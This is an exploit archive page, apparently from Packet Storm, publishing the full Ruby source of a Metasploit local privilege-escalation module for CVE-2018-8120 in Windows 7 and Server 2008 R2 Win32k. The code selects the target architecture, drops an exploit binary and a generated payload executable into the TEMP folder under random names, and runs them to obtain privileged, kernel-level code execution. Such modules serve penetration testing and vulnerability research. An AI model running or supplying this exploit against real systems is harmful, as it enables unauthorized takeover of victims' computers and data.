what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Windows SetImeInfoEx Win32k NULL Pointer Dereference

Microsoft Windows SetImeInfoEx Win32k NULL Pointer Dereference
Posted Oct 19, 2018
Authored by Dhiraj Mishra, unamer, bigric3, Anton Cherepanov | Site metasploit.com

This Metasploit module exploits an elevation of privilege vulnerability that exists in Windows 7 and 2008 R2 when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploits this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. This Metasploit module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64.

tags | exploit, arbitrary, x86, kernel
systems | windows
advisories | CVE-2018-8120
SHA-256 | 79eca834aca76d7c9dcfa923affa9994710ca886d5626b9d0a2674dfb96f1d76

Microsoft Windows SetImeInfoEx Win32k NULL Pointer Dereference

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking

include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
include Msf::Exploit::FileDropper


def initialize(info={})
super(update_info(info,
'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference',
'Description' => %q{
This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2
when the Win32k component fails to properly handle objects in memory. An attacker who
successfully exploited this vulnerability could run arbitrary code in kernel mode. An
attacker could then install programs; view, change, or delete data; or create new
accounts with full user rights.

This module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64.
},
'License' => MSF_LICENSE,
'Author' => [
'unamer', # Exploit PoC
'bigric3', # Analysis and exploit
'Anton Cherepanov', # Vulnerability discovery
'Dhiraj Mishra <dhiraj@notsosecure.com>' # Metasploit
],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' => {
'EXITFUNC' => 'thread'
},
'Targets' => [
[ 'Automatic', {} ],
[ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ],
[ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ]
],
'Payload' => {
'Space' => 4096,
'DisableNops' => true
},
'References' => [
['BID', '104034'],
['CVE', '2018-8120'],
['URL', 'https://github.com/unamer/CVE-2018-8120'],
['URL', 'https://github.com/bigric3/cve-2018-8120'],
['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'],
['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120']
],
'DisclosureDate' => 'May 9 2018',
'DefaultTarget' => 0
))
end

def assign_target
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end

if sysinfo['OS'] =~ /XP|NT/i
fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
end

return target unless target.name == 'Automatic'

case sysinfo['Architecture']
when 'x64'
vprint_status('Targeting x64 system')
return targets[1]
when 'x86'
fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64
vprint_status('Targeting x86 system')
return targets[2]
end
end

def write_file_to_target(fname, data)
tempdir = session.sys.config.getenv('TEMP')
file_loc = "#{tempdir}\\#{fname}"
vprint_warning("Attempting to write #{fname} to #{tempdir}")
write_file(file_loc, data)
vprint_good("#{fname} written")
file_loc
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful")
end

def check_arch
sys_arch = assign_target
if sys_arch.name =~ /x86/
return 'CVE-2018-8120x86.exe'
else sys_arch.name =~ /x64/
return 'CVE-2018-8120x64.exe'
end
end

def exploit
cve_fname = check_arch
rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', cve_fname)
vprint_status("Reading payload from file #{rexe}")
raw = File.read(rexe)

rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe"
vprint_status("EXE's name is: #{rexename}")
exe = generate_payload_exe
tempexename = "#{Rex::Text.rand_text_alpha(6..14)}.exe"

exe_payload = write_file_to_target(tempexename, exe)
vprint_status("Payload uploaded to temp folder")
cve_exe = write_file_to_target(rexename, raw)
command = "\"#{cve_exe}\" \"#{exe_payload}\""
vprint_status("Location of CVE-2018-8120.exe is: #{cve_exe}")
register_file_for_cleanup(exe_payload)

vprint_status("Executing command : #{command}")
cmd_exec_get_pid(command)
print_good('Exploit finished, wait for privileged payload execution to complete.')
end
end
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    28 Files
  • 17
    Oct 17th
    23 Files
  • 18
    Oct 18th
    10 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    5 Files
  • 22
    Oct 22nd
    12 Files
  • 23
    Oct 23rd
    23 Files
  • 24
    Oct 24th
    8 Files
  • 25
    Oct 25th
    10 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    7 Files
  • 29
    Oct 29th
    17 Files
  • 30
    Oct 30th
    39 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close